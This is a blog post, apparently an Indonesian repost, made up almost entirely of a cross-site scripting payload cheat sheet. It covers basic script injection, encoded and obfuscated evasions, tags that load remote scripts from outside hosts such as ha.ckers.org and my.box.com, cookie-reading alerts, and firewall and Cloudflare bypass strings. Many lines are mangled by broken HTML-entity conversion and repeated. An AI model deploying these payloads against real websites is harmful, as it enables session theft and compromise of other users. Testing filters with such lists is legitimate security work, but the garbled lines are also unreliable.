Cross-site Scripting Payloads Cheat Sheet

Cross-site Scripting Payloads Cheat Sheet - Hai Semua, selamat datang di blog Noob1t4, Pada Artikel yang kalian baca kali ini dengan judul Cross-site Scripting Payloads Cheat Sheet, kami telah mempersiapkan artikel ini dengan baik untuk kalian baca dan ambil informasi didalamnya. mudah-mudahan isi postingan yang kami tulis ini dapat kalian pahami. baiklah, selamat membaca.

Cross-site Scripting Payloads Cheat Sheet – Cross-Site Scripting (XSS) attacks are a type of injection, in which malicious scripts are injected into otherwise benign and trusted web sites. XSS attacks occur when an attacker uses a web application to send malicious code, generally in the form of a browser side script, to a different end user. Flaws that allow these attacks to succeed are quite widespread and occur anywhere a web application uses input from a user within the output it generates without validating or encoding it.

in


Basic Payload


<script>alert(123)</script>
<img src=javascript:alert('XSS');>
<script>alert(XSS);</script>
javascript:alert(XSS)

Another Payload


<img src=javascript:alert(quot;XSSquot;)>
<';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//;alert(String.fromCharCode(88,83,83))//\;alert(String.fromCharCode(88,83,83))//--></SCRIPT>>'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
<META HTTP-EQUIV=refresh CONTENT=0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K>
<IFRAME SRC=javascript:alert('XSS');></IFRAME>
<EMBED SRC=data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dH A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcv MjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hs aW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAw IiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlh TUyIpOzwvc2NyaXB0Pjwvc3ZnPg== type=image/svg+xml AllowScriptAccess=always></EMBED>

<SCRIPT a=> SRC=http://ha.ckers.org/xss.js></SCRIPT>
<SCRIPT a=> '' SRC=http://ha.ckers.org/xss.js></SCRIPT>
<SCRIPT a='>' SRC=http://ha.ckers.org/xss.js></SCRIPT>
<SCRIPT a=>'> SRC=http://ha.ckers.org/xss.js></SCRIPT>
<SCRIPT>document.write(<SCRI);</SCRIPT>PT SRC=http://ha.ckers.org/xss.js></SCRIPT>

<<SCRIPT>alert(XSS);//<</SCRIPT>
<';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//;alert(String.fromCharCode(88,83,83))//\;alert(String.fromCharCode(88,83,83))//--></SCRIPT>>'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//;alert(String.fromCharCode(88,83,83))//\;alert(String.fromCharCode(88,83,83))//--></SCRIPT>>'><SCRIPT>alert(String.fromCharCode(88,83,83))<?/SCRIPT>submit.x=27submit.y=9cmd=search
<script>alert(XSS)</script>safe=highcx=006665157904466893121:su_tzknyxugcof=FORID:9#510
<script>alert(XSS);</script>search=1
0q=';alert(String.fromCharCode(88,83,83))//\';alert%2?8String.fromCharCode(88,83,83))//;alert(String.fromCharCode?(88,83,83))//\;alert(String.fromCharCode(88,83,83)%?29//--></SCRIPT>>'><SCRIPT>alert(String.fromCharCode(88,83%?2C83))</SCRIPT>submit-frmGoogleWeb=Web+Search
<h1><font color=blue>hellox worldss</h1>

<BODY ONLOAD=alert('hellox worldss')>
<input onfocus=write(XSS) autofocus>
<input onblur=write(XSS) autofocus><input autofocus>
<body onscroll=alert(XSS)><br><br><br><br><br><br>...<br><br><br><br><input autofocus>
<form><button formaction=javascript:alert(XSS)>lol
<!--<img src=--><img src=x onerror=alert(XSS)//>
<![><img src=]><img src=x onerror=alert(XSS)//>
<style><img src=</style><img src=x onerror=alert(XSS)//>

<? foo=><script>alert(1)</script>>
<! foo=><script>alert(1)</script>>
</ foo=><script>alert(1)</script>>
<? foo=><x foo='?><script>alert(1)</script>'>>
<! foo=[[[Inception]]><x foo=]foo><script>alert(1)</script>>
<% foo><x foo=%><script>alert(123)</script>>
<div style=font-family:'foo#10;;color:red;';>LOL

LOL<style>*{/*all*/color/*all*/:/*all*/red/*all*/;/[0]*IE,Safari*[0]/color:green;color:bl/*IE*/ue;}</style>
<script>({0:#0=alert/#0#/#0#(0)})</script>
<svg xmlns=http://www.w3.org/2000/svg>LOL<script>alert(123)</script></svg>
lt;SCRIPTgt;alert(/XSS/#46;source)lt;/SCRIPTgt;
\\;alert('XSS');//
lt;/TITLEgt;lt;SCRIPTgt;alert(\XSS\);lt;/SCRIPTgt;
lt;INPUT TYPE=\IMAGE\ SRC=\javascript#058;alert('XSS');\gt;
lt;BODY BACKGROUND=\javascript#058;alert('XSS')\gt;
lt;BODY ONLOAD=alert('XSS')gt;
lt;IMG DYNSRC=\javascript#058;alert('XSS')\gt;
lt;IMG LOWSRC=\javascript#058;alert('XSS')\gt;
lt;BGSOUND SRC=\javascript#058;alert('XSS');\gt;
lt;BR SIZE=\{alert('XSS')}\gt;
lt;LAYER SRC=\http#58;//ha#46;ckers#46;org/scriptlet#46;html\gt;lt;/LAYERgt;
lt;LINK REL=\stylesheet\ HREF=\javascript#058;alert('XSS');\gt;
lt;LINK REL=\stylesheet\ HREF=\http#58;//ha#46;ckers#46;org/xss#46;css\gt;
lt;STYLEgt;@import'http#58;//ha#46;ckers#46;org/xss#46;css';lt;/STYLEgt;
lt;META HTTP-EQUIV=\Link\ Content=\lt;http#58;//ha#46;ckers#46;org/xss#46;cssgt;; REL=stylesheet\gt;
lt;STYLEgt;BODY{-moz-binding#58;url(\http#58;//ha#46;ckers#46;org/xssmoz#46;xml#xss\)}lt;/STYLEgt;
lt;XSS STYLE=\behavior#58; url(xss#46;htc);\gt;
lt;STYLEgt;li {list-style-image#58; url(\javascript#058;alert('XSS')\);}lt;/STYLEgt;lt;ULgt;lt;LIgt;XSS
lt;IMG SRC='vbscript#058;msgbox(\XSS\)'gt;
lt;IMG SRC=\mocha#58;#91;code#93;\gt;
lt;IMG SRC=\livescript#058;#91;code#93;\gt;
žscriptualert(EXSSE)ž/scriptu
lt;META HTTP-EQUIV=\refresh\ CONTENT=\0;url=javascript#058;alert('XSS');\gt;
lt;META HTTP-EQUIV=\refresh\ CONTENT=\0;url=data#58;text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K\gt;
lt;META HTTP-EQUIV=\refresh\ CONTENT=\0; URL=http#58;//;URL=javascript#058;alert('XSS');\
lt;IFRAME SRC=\javascript#058;alert('XSS');\gt;lt;/IFRAMEgt;
lt;FRAMESETgt;lt;FRAME SRC=\javascript#058;alert('XSS');\gt;lt;/FRAMESETgt;
lt;TABLE BACKGROUND=\javascript#058;alert('XSS')\gt;
lt;TABLEgt;lt;TD BACKGROUND=\javascript#058;alert('XSS')\gt;
lt;DIV STYLE=\background-image#58; url(javascript#058;alert('XSS'))\gt;
lt;DIV STYLE=\background-image#58;\0075\0072\006C\0028'\006a\0061\0076\0061\0073\0063\0072\0069\0070\0074\003a\0061\006c\0065\0072\0074\0028#46;1027\0058#46;1053\0053\0027\0029'\0029\gt;
lt;DIV STYLE=\background-image#58; url(javascript#058;alert('XSS'))\gt;
lt;DIV STYLE=\width#58; expression(alert('XSS'));\gt;
lt;STYLEgt;@im\port'\ja\vasc\ript#58;alert(\XSS\)';lt;/STYLEgt;
lt;IMG STYLE=\xss#58;expr/*XSS*/ession(alert('XSS'))\gt;
lt;XSS STYLE=\xss#58;expression(alert('XSS'))\gt;
exp/*lt;A STYLE='no\xss#58;noxss(\*//*\);
xss#58;ex#x2F;*XSS*//*/*/pression(alert(\XSS\))'gt;
lt;STYLE TYPE=\text/javascript\gt;alert('XSS');lt;/STYLEgt;
lt;STYLEgt;#46;XSS{background-image#58;url(\javascript#058;alert('XSS')\);}lt;/STYLEgt;lt;A CLASS=XSSgt;lt;/Agt;
lt;STYLE type=\text/css\gt;BODY{background#58;url(\javascript#058;alert('XSS')\)}lt;/STYLEgt;
lt;!--#91;if gte IE 4#93;gt;
lt;SCRIPTgt;alert('XSS');lt;/SCRIPTgt;
lt;!#91;endif#93;--gt;
lt;BASE HREF=\javascript#058;alert('XSS');//\gt;
lt;OBJECT TYPE=\text/x-scriptlet\ DATA=\http#58;//ha#46;ckers#46;org/scriptlet#46;html\gt;lt;/OBJECTgt;
lt;OBJECT classid=clsid#58;ae24fdae-03c6-11d1-8b76-0080c744f389gt;lt;param name=url value=javascript#058;alert('XSS')gt;lt;/OBJECTgt;
lt;EMBED SRC=\http#58;//ha#46;ckers#46;org/xss#46;swf\ AllowScriptAccess=\always\gt;lt;/EMBEDgt;
lt;EMBED SRC=\data#58;image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dH A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcv MjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hs aW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAw IiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlh TUyIpOzwvc2NyaXB0Pjwvc3ZnPg==\ type=\image/svg+xml\ AllowScriptAccess=\always\gt;lt;/EMBEDgt;
a=\get\;
b=\URL(\\\;
c=\javascript#058;\;
d=\alert('XSS');\\)\;
eval(a+b+c+d);
lt;HTML xmlns#58;xssgt;lt;?import namespace=\xss\ implementation=\http#58;//ha#46;ckers#46;org/xss#46;htc\gt;lt;xss#58;xssgt;XSSlt;/xss#58;xssgt;lt;/HTMLgt;
lt;XML ID=Igt;lt;Xgt;lt;Cgt;lt;!#91;CDATA#91;lt;IMG SRC=\javas#93;#93;gt;lt;!#91;CDATA#91;cript#58;alert('XSS');\gt;#93;#93;gt;
lt;/Cgt;lt;/Xgt;lt;/xmlgt;lt;SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTMLgt;lt;/SPANgt;
lt;XML ID=\xss\gt;lt;Igt;lt;Bgt;lt;IMG SRC=\javaslt;!-- --gt;cript#58;alert('XSS')\gt;lt;/Bgt;lt;/Igt;lt;/XMLgt;
lt;SPAN DATASRC=\#xss\ DATAFLD=\B\ DATAFORMATAS=\HTML\gt;lt;/SPANgt;
lt;XML SRC=\xsstest#46;xml\ ID=Igt;lt;/XMLgt;
lt;SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTMLgt;lt;/SPANgt;
lt;HTMLgt;lt;BODYgt;
lt;?xml#58;namespace prefix=\t\ ns=\urn#58;schemas-microsoft-com#58;time\gt;
lt;?import namespace=\t\ implementation=\#default#time2\gt;
lt;t#58;set attributeName=\innerHTML\ to=\XSSlt;SCRIPT DEFERgt;alert(quot;XSSquot;)lt;/SCRIPTgt;\gt;
lt;/BODYgt;lt;/HTMLgt;
lt;SCRIPT SRC=\http#58;//ha#46;ckers#46;org/xss#46;jpg\gt;lt;/SCRIPTgt;
lt;!--#exec cmd=\/bin/echo 'lt;SCR'\--gt;lt;!--#exec cmd=\/bin/echo 'IPT SRC=http#58;//ha#46;ckers#46;org/xss#46;jsgt;lt;/SCRIPTgt;'\--gt;
lt;? echo('lt;SCR)';
echo('IPTgt;alert(\XSS\)lt;/SCRIPTgt;'); ?gt;
lt;IMG SRC=\http#58;//www#46;thesiteyouareon#46;com/somecommand#46;php?somevariables=maliciouscode\gt;
Redirect 302 /a#46;jpg http#58;//victimsite#46;com/admin#46;aspdeleteuser
lt;META HTTP-EQUIV=\Set-Cookie\ Content=\USERID=lt;SCRIPTgt;alert('XSS')lt;/SCRIPTgt;\gt;
lt;HEADgt;lt;META HTTP-EQUIV=\CONTENT-TYPE\ CONTENT=\text/html; charset=UTF-7\gt; lt;/HEADgt;+ADw-SCRIPT+AD4-alert('XSS');+ADw-/SCRIPT+AD4-
lt;SCRIPT a=\gt;\ SRC=\http#58;//ha#46;ckers#46;org/xss#46;js\gt;lt;/SCRIPTgt;
lt;SCRIPT =\gt;\ SRC=\http#58;//ha#46;ckers#46;org/xss#46;js\gt;lt;/SCRIPTgt;
lt;SCRIPT a=\gt;\ '' SRC=\http#58;//ha#46;ckers#46;org/xss#46;js\gt;lt;/SCRIPTgt;
lt;SCRIPT \a='gt;'\ SRC=\http#58;//ha#46;ckers#46;org/xss#46;js\gt;lt;/SCRIPTgt;
lt;SCRIPT a=`gt;` SRC=\http#58;//ha#46;ckers#46;org/xss#46;js\gt;lt;/SCRIPTgt;
lt;SCRIPT a=\gt;'gt;\ SRC=\http#58;//ha#46;ckers#46;org/xss#46;js\gt;lt;/SCRIPTgt;
lt;SCRIPTgt;document#46;write(\lt;SCRI\);lt;/SCRIPTgt;PT SRC=\http#58;//ha#46;ckers#46;org/xss#46;js\gt;lt;/SCRIPTgt;
lt;A HREF=\http#58;//66#46;102#46;7#46;147/\gt;XSSlt;/Agt;
lt;A HREF=\http#58;//%77%77%77%2E%67%6F%6F%67%6C%65%2E%63%6F%6D\gt;XSSlt;/Agt;
lt;A HREF=\http#58;//1113982867/\gt;XSSlt;/Agt;
lt;A HREF=\http#58;//0x42#46;0x0000066#46;0x7#46;0x93/\gt;XSSlt;/Agt;
lt;A HREF=\http#58;//0102#46;0146#46;0007#46;00000223/\gt;XSSlt;/Agt;
lt;A HREF=\htt p#58;//6 6#46;000146#46;0x7#46;147/\gt;XSSlt;/Agt;
lt;A HREF=\//www#46;google#46;com/\gt;XSSlt;/Agt;
lt;A HREF=\//google\gt;XSSlt;/Agt;
lt;A HREF=\http#58;//ha#46;ckers#46;org@google\gt;XSSlt;/Agt;
lt;A HREF=\http#58;//google#58;ha#46;ckers#46;org\gt;XSSlt;/Agt;
lt;A HREF=\http#58;//google#46;com/\gt;XSSlt;/Agt;
lt;A HREF=\http#58;//www#46;google#46;com#46;/\gt;XSSlt;/Agt;
lt;A HREF=\javascript#058;document#46;location='http#58;//www#46;google#46;com/'\gt;XSSlt;/Agt;
lt;A HREF=\http#58;//www#46;gohttp#58;//www#46;google#46;com/ogle#46;com/\gt;XSSlt;/Agt;
lt;iframe src=http#58;//ha#46;ckers#46;org/scriptlet#46;htmlgt;
lt;IMG SRC=\javascript#058;alert('XSS')\
lt;SCRIPT SRC=//ha#46;ckers#46;org/#46;jsgt;
lt;SCRIPT SRC=http#58;//ha#46;ckers#46;org/xss#46;js?lt;Bgt;
lt;lt;SCRIPTgt;alert(\XSS\);//lt;lt;/SCRIPTgt;
lt;SCRIPT/SRC=\http#58;//ha#46;ckers#46;org/xss#46;js\gt;lt;/SCRIPTgt;
lt;BODY onload!#$%()* +-_#46;,#58;;?@#91;/|\#93;^`=alert(\XSS\)gt;
lt;SCRIPT/XSS SRC=\http#58;//ha#46;ckers#46;org/xss#46;js\gt;lt;/SCRIPTgt;
lt;IMG SRC=\ javascript#058;alert('XSS');\gt;
perl -e 'print \lt;SCR\0IPTgt;alert(\\XSS\\)lt;/SCR\0IPTgt;\;' gt; out
perl -e 'print \lt;IMG SRC=java\0script#058;alert(\\XSS\\)gt;\;' gt; out
lt;IMG SRC=\jav#x0D;ascript#058;alert('XSS');\gt;
lt;IMG SRC=\jav#x0A;ascript#058;alert('XSS');\gt;
lt;IMG SRC=\jav#x09;ascript#058;alert('XSS');\gt;
lt;IMG SRC=#x6A#x61#x76#x61#x73#x63#x72#x69#x70#x74#x3A#x61#x6C#x65#x72#x74#x28#x27#x58#x53#x53#x27#x29gt;
lt;IMG SRC=#0000106#0000097#0000118#0000097#0000115#0000099#0000114#0000105#0000112#0000116#0000058#0000097#0000108#0000101#0000114#0000116#0000040#0000039#0000088#0000083#0000083#0000039#0000041gt;
lt;IMG SRC=javascript#058;alert('XSS')gt;
lt;IMG SRC=javascript#058;alert(String#46;fromCharCode(88,83,83))gt;
lt;IMG \\\gt;lt;SCRIPTgt;alert(\XSS\)lt;/SCRIPTgt;\gt;
lt;IMG SRC=`javascript#058;alert(\RSnake says, 'XSS'\)`gt;
lt;IMG SRC=javascript#058;alert(quot;XSSquot;)gt;
lt;IMG SRC=JaVaScRiPt#058;alert('XSS')gt;
lt;IMG SRC=javascript#058;alert('XSS')gt;
lt;IMG SRC=\javascript#058;alert('XSS');\gt;
lt;SCRIPT SRC=http#58;//ha#46;ckers#46;org/xss#46;jsgt;lt;/SCRIPTgt;
'';!--\lt;XSSgt;={()}
';alert(String#46;fromCharCode(88,83,83))//\';alert(String#46;fromCharCode(88,83,83))//\;alert(String#46;fromCharCode(88,83,83))//\\;alert(String#46;fromCharCode(88,83,83))//--gt;lt;/SCRIPTgt;\gt;'gt;lt;SCRIPTgt;alert(String#46;fromCharCode(88,83,83))lt;/SCRIPTgt;
';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//;alert(String.fromCharCode(88,83,83))//\;alert(String.fromCharCode(88,83,83))//--></SCRIPT>>'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
'';!--<XSS>={()}
<SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT>

<IMG SRC=javascript:alert('XSS')>
<IMG SRC=javascrscriptipt:alert('XSS')>
<IMG SRC=JaVaScRiPt:alert('XSS')>
<IMG ><SCRIPT>alert(XSS)</SCRIPT>>
<IMG SRC= #14; javascript:alert('XSS');>

<SCRIPT/XSS SRC=http://ha.ckers.org/xss.js></SCRIPT>
<SCRIPT/SRC=http://ha.ckers.org/xss.js></SCRIPT>
<<SCRIPT>alert(XSS);//<</SCRIPT>
<SCRIPT>a=/XSS/alert(a.source)</SCRIPT>
\;alert('XSS');//
</TITLE><SCRIPT>alert(XSS);</SCRIPT>
ŒscriptŸalert(¢XSS¢)Œ/scriptŸ
<META HTTP-EQUIV=refresh CONTENT=0;url=javascript:alert('XSS');>
<IFRAME SRC=javascript:alert('XSS');></IFRAME>
<FRAMESET><FRAME SRC=javascript:alert('XSS');></FRAMESET>
<TABLE BACKGROUND=javascript:alert('XSS')>
<TABLE><TD BACKGROUND=javascript:alert('XSS')>
<DIV STYLE=background-image: url(javascript:alert('XSS'))>
<DIV STYLE=background-image:\0075\0072\006C\0028'\006a\0061\0076\0061\0073\0063\0072\0069\0070\0074\003a\0061\006c\0065\0072\0074\0028.1027\0058.1053\0053\0027\0029'\0029>
<DIV STYLE=width: expression(alert('XSS'));>
<STYLE>@im\port'\ja\vasc\ript:alert(XSS)';</STYLE>
<IMG STYLE=xss:expr/*XSS*/ession(alert('XSS'))>
<XSS STYLE=xss:expression(alert('XSS'))>
exp/*<A STYLE='no\xss:noxss(*//*);xss:#101;x#x2F;*XSS*//*/*/pression(alert(XSS))'>
<EMBED SRC=http://ha.ckers.org/xss.swf AllowScriptAccess=always></EMBED>
a=get;b=URL(ja\;c=vascr;d=ipt:ale;e=rt('XSS');\);eval(a+b+c+d+e);
<SCRIPT SRC=http://ha.ckers.org/xss.jpg></SCRIPT>
<HTML><BODY><?xml:namespace prefix=t ns=urn:schemas-microsoft-com:time><?import namespace=t implementation=#default#time2><t:set attributeName=innerHTML to=XSSlt;SCRIPT DEFERgt;alert(quot;XSSquot;)lt;/SCRIPTgt;></BODY></HTML>
<SCRIPT>document.write(<SCRI);</SCRIPT>PT SRC=http://ha.ckers.org/xss.js></SCRIPT>
<form id=test /><button form=test formaction=javascript:alert(123)>TESTHTML5FORMACTION
<form><button formaction=javascript:alert(123)>crosssitespt
<frameset onload=alert(123)>
<!--<img src=--><img src=x onerror=alert(123)//>
<style><img src=</style><img src=x onerror=alert(123)//>
<object data=data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==>
<embed src=data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==>
<embed src=javascript:alert(1)>

<? foo=><script>alert(1)</script>>
<! foo=><script>alert(1)</script>>
</ foo=><script>alert(1)</script>>

<script>({0:#0=alert/#0#/#0#(123)})</script>
<script>ReferenceError.prototype.__defineGetter__('name', function(){alert(123)}),x</script>
<script>Object.__noSuchMethod__ = Function,[{}][0].constructor._('alert(1)')()</script>
<script src=#>{alert(1)}</script>;1
<script>crypto.generateCRMFRequest('CN=0',0,0,null,'alert(1)',384,null,'rsa-dual-use')</script>
<svg xmlns=#><script>alert(1)</script></svg>
<svg onload=javascript:alert(123) xmlns=#></svg>
<iframe xmlns=# src=javascript:alert(1)></iframe>
+ADw-script+AD4-alert(document.location)+ADw-/script+AD4-
%2BADw-script+AD4-alert(document.location)%2BADw-/script%2BAD4-
+ACIAPgA8-script+AD4-alert(document.location)+ADw-/script+AD4APAAi-
%2BACIAPgA8-script%2BAD4-alert%28document.location%29%2BADw-%2Fscript%2BAD4APAAi-
%253cscript%253ealert(document.cookie)%253c/script%253e
“><s”%2b”cript>alert(document.cookie)</script>
“><ScRiPt>alert(document.cookie)</script>
“><<script>alert(document.cookie);//<</script>
foo%00<script>alert(document.cookie)</script>
<scr<script>ipt>alert(document.cookie)</scr</script>ipt>
%22/%3E%3CBODY%20onload=’document.write(%22%3Cs%22%2b%22cript%20src=http://my.box.com/xss.js%3E%3C/script%3E%22)’%3E
‘; alert(document.cookie); var foo=’
foo\’; alert(document.cookie);//’;
</script><script >alert(document.cookie)</script>
<img src=asdf onerror=alert(document.cookie)>
<BODY ONLOAD=alert(’XSS’)>
><script>alert(String.fromCharCode(66, 108, 65, 99, 75, 73, 99, 101))</script>
<video src=1 onerror=alert(1)>
<audio src=1 onerror=alert(1)>

Double quoted


`autofocus onfocus=alert(1)`
`autofocus onfocus=alert(1)//`
`onbeforescriptexecute=alert(1)//`
`onmouseover=alert(1)//` (Interaction)
`autofocus onblur=alert(1)` (Interaction)

Single Quoted


`'autofocus onfocus='alert(1)`
`'autofocus onfocus=alert(1)//`
`'onbeforescriptexecute=alert(1)//`
`'onmouseover='alert(1)//` (Interaction)
`'autofocus onblur='alert(1)` (Interaction)

Without Quotations


`aaaa autofocus onfocus=alert(1)//`
`aaaa onbeforescriptexecute=alert(1)//`
`aaaa onmouseover=alert(1)//`

Bypass Firewall


><input/onauxclick=[1].map(prompt)>
<img src=x onerror=eval(atob('YWxlcnQoJ0kgb25seSB3cml0ZSBsYW1lIFBvQ3MnKQ==')) />
'--><Body onbeforescriptexecute=[1].map(confirm)>
'-prompt.call(window, 'xss')-'
'-alert.call(window, 'xss')-'
<\/script><script>alert('XSS')<\/script>
aaabbb'ccc<svg onload=alert('XSS')>eee
javascript://%0a%0dalert(document.cookie)
<--`<img/src=`%20onerror=confirm``>%20--!>
<svg </onload =1> (_=alert,_(1337)) >
<details/open/ontoggle=window.alert`xss`>

Cloudflare Bypass


Cloudflare XSS Bypasses by @Bohdan Korzhynskyi – 3rd june 2019


<svg onload=prompt%26%230000000040document.domain)>
<svg onload=prompt%26%23x000000028;document.domain)>
xss'><iframe srcdoc='%26lt;script>;prompt`${document.domain}`%26lt;/script>'>

Cloudflare XSS Bypass – 22nd march 2019 (by @RakeshMane10)


<svg/onload=#97#108#101#114#00116#40#41#x2f#x2f

Another payload



  • https://github.com/ismailtasdelen/xss-payload-list

  • https://github.com/s0md3v/AwesomeXSS

  • https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/XSS%20Injection


Different case need different payload.



Sumber http://noob1t4.blogspot.com/

Artikel Menarik Lainnya:




Sekian Artikel Cross-site Scripting Payloads Cheat Sheet.
Terima kasih telah membaca artikel Cross-site Scripting Payloads Cheat Sheet, mudah-mudahan bisa memberi manfaat untuk kalian semua. Baiklah, sampai jumpa di postingan artikel lainnya.


Semua artikel tutorial di blog ini hanya untuk sebatas Pembelajaran dan Pengetahuan saja, jika kalian meyalahgunakan tutorial di blog ini, itu bukan tanggung jawab saya. Terima kasih sudah berkunjung ke blog Noob1t4, saya harap agan berkunjung kembali kesini

0 Response to "Cross-site Scripting Payloads Cheat Sheet"

Posting Komentar

Iklan Atas Artikel

Iklan Tengah Artikel 1

Iklan Tengah Artikel 2

Iklan Bawah Artikel